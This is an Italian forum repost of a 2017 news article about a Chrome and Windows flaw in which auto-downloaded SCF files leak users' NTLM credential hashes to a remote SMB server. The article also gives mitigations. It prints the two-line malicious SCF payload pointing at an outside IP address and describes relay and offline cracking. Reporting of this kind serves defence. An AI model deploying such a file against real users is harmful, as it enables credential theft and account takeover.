Torna indietro   Hardware Upgrade Forum > Networking e sicurezza > Antivirus e Sicurezza > News - AV e sicurezza

Hisense M2 Pro: dove lo metti, sta. Mini proiettore laser 4K per il cinema ovunque
Hisense M2 Pro: dove lo metti, sta. Mini proiettore laser 4K per il cinema ovunque
Dal salotto al giardino, il nuovo proiettore laser di Hisense promette esperienze cinematografiche in qualsiasi contesto: qualità d’immagine, semplicità d’uso, versatilità e prezzo competitivo il suo poker d'assi
Lenovo ThinkPad X1 2-in-1 G10 Aura Edition: il convertibile di classe
Lenovo ThinkPad X1 2-in-1 G10 Aura Edition: il convertibile di classe
La flessibilità di configurazione è il punto di forza di questo 2-in-1, che ripropone in un form factor alternativo tutta la tipica qualità dei prodotti Lenovo della famiglia ThinkPad. Qualità costruttiva ai vertici, ottima dotazione hardware ma costo che si presenta molto elevato.
Intervista a Stop Killing Games: distruggere videogiochi è come bruciare la musica di Mozart
Intervista a Stop Killing Games: distruggere videogiochi è come bruciare la musica di Mozart
Mentre Ubisoft vorrebbe chiedere agli utenti, all'occorrenza, di distruggere perfino le copie fisiche dei propri giochi, il movimento Stop Killing Games si sta battendo per preservare quella che l'Unione Europea ha già riconosciuto come una forma d'arte. Abbiamo avuto modo di parlare con Daniel Ondruska, portavoce dell'Iniziativa Europa volta a preservare la conservazione dei videogiochi
Tutti gli articoli Tutte le news

Vai al Forum
Rispondi
 
Strumenti
Old 23-05-2017, 09:01   #1
c.m.g
Senior Member
 
L'Avatar di c.m.g
 
Iscritto dal: Mar 2006
Messaggi: 22111
[NEWS] Chrome, un bug per rubare credenziali Windows

lunedì 22 maggio 2017

Spoiler:
Quote:
Il famoso browser di Google contiene un bug che se sfruttato potrebbe consentire agli hacker di rubare le credenziali di autenticazione della vittima e lanciare attacchi di tipo SMB Relay


Roma - Gli attacchi che coinvolgono il protocollo SMB su Windows sono un problema costante e gli exploit finora conosciuti sono innumerevoli. Recentemente un security engineerdi DefenseCode, Bosko Stakanovic ha scoperto una vulnerabilità dovuta alla configurazione di default di Google Chrome e al comportamento di Windows 10 nel trattamento dei file SCF.



Con questa configurazione di default il browser scarica automaticamente i file che ritiene sicuri senza interrogare l'utente sulla locazione in cui verrà effettuato il download, ma usando la cartella presente di default.

L'estensione SCF (Windows Explorer Shell Command) è utilizzata dai tempi di Windows 98 per creare dei file speciali con icona personalizzata in grado di richiamare funzionalità di sistema, come ad esempio il collegamento "Mostra Desktop".Come spiegato da Stakanovich una volta che l'utente viene portato a cliccare su un link malevolo questo innesca un download automatico di un file di tipo SCF, che induce Windows ad effettuare un tentativo di autenticazione a un server SMB remoto. Il file malevolo può contenere anche solo due righe, come nell'esempio seguente:

[Shell]
IconFile=\\170.170.170.170\icon

L'SCF, una volta scaricato, rimane dormiente finché la vittima non apre la cartella "Download", dopodiché, senza bisogno che l'utente clicchi sul file scaricato Windows, tenterà automaticamente di raggiungere "l'icona" specificata, presentando le sue credenziali al server remoto.
Ciò fornisce all'attaccante l'username della vittima e l'hash NTLMv2 delle password, che potranno essere utilizzati offline per il cracking o per accedere direttamente ad altri servizi che accettano lo stesso tipo di autenticazione.

Stakanovich sostiene che questo attacco può essere usato anche per perpetrare attacchi di tipo SMB relay: le organizzazioni che permettono accesso remoto a servizi come Microsoft Exchange e usano NTLM come metodo di autenticazione potrebbero essere vulnerabili, permettendo all'hacker di accedere ai dati senza dover rompere la password.

Questi tipi di attacchi permettono a utenti malevoli di impersonare altri soggetti, perciò sono un problema anche per le grandi aziende; le credenziali rubate possono essere utilizzate in tempi successivi al loro furto per eseguire privilege escalation al fine di prendere il controllo delle risorse IT.
Per gli utenti di Windows 8/10 che usano un account Microsoft, invece che l'account locale, avranno impatto anche su tutti i servizi Microsoft collegati (Outlook.com, Office360 ecc.).

Al momento, Chrome sta lavorando a un fix. Nel frattempo, per proteggersi dagli impatti della vulnerabilità, si raccomanda di disabilitare il salvataggio automatico dei file in Chrome andando nel menu Impostazioni/Mostra impostazioni avanzate e selezionando l'opzione Richiedi dove salvare ogni file prima di scaricare.
Inoltre, è consigliabile limitare il traffico SMB alle reti private, configurando il firewall di modo da bloccare le porte 137, 138, 139 e 445 verso la rete Internet.

Ilaria Di Maro





Fonte immagine: http://cdn.images.express.co.uk/img/...445/805729.jpg

Fonte: Punto Informatico
__________________
Questa opera è distribuita secondo le regole di licenza Creative Commons salvo diversa indicazione. Chiunque volesse citare il contenuto di questo post deve necessariamente riportare il link originario.
c.m.g è offline   Rispondi citando il messaggio o parte di esso
 Rispondi


Hisense M2 Pro: dove lo metti, sta. Mini proiettore laser 4K per il cinema ovunque Hisense M2 Pro: dove lo metti, sta. Mini proiett...
Lenovo ThinkPad X1 2-in-1 G10 Aura Edition: il convertibile di classe Lenovo ThinkPad X1 2-in-1 G10 Aura Edition: il c...
Intervista a Stop Killing Games: distruggere videogiochi è come bruciare la musica di Mozart Intervista a Stop Killing Games: distruggere vid...
Samsung Galaxy S25 Edge: il top di gamma ultrasottile e leggerissimo. La recensione Samsung Galaxy S25 Edge: il top di gamma ultraso...
HP Elitebook Ultra G1i 14 è il notebook compatto, potente e robusto HP Elitebook Ultra G1i 14 è il notebook c...
Elgato Facecam 4K: ecco la nuova webcam ...
Stampa 3D senza sprechi e senza rifiuti?...
OPPO Find X9 Pro potrebbe battere ogni r...
Le nuove Sony WH-1000XM6 ora disponibili...
ChatGPT Agent come un essere umano: l'AI...
Samsung rivaluta la fabbrica per il pack...
'La potenza di 16 core, nel palmo della ...
Windows 10 compie 10 anni, ma il cambiam...
Un altro Pixel 6a ha preso fuoco: la pro...
NVIDIA, ritorno in Cina in grande stile?...
Tutti contro Windows Recall: un altro se...
PlayStation FlexStrike: il sogno di un f...
WhatsApp sorprende tutti: ecco la nuova ...
Addio GTX 1080 Ti: la scheda che ha fatt...
Ex Ilva di Taranto, 'Teslari' contro il ...
Chromium
GPU-Z
OCCT
LibreOffice Portable
Opera One Portable
Opera One 106
CCleaner Portable
CCleaner Standard
Cpu-Z
Driver NVIDIA GeForce 546.65 WHQL
SmartFTP
Trillian
Google Chrome Portable
Google Chrome 120
VirtualBox
Tutti gli articoli Tutte le news Tutti i download

Strumenti

Regole
Non Puoi aprire nuove discussioni
Non Puoi rispondere ai messaggi
Non Puoi allegare file
Non Puoi modificare i tuoi messaggi

Il codice vB è On
Le Faccine sono On
Il codice [IMG] è On
Il codice HTML è Off
Vai al Forum


Tutti gli orari sono GMT +1. Ora sono le: 16:49.


Powered by vBulletin® Version 3.6.4
Copyright ©2000 - 2025, Jelsoft Enterprises Ltd.
Served by www3v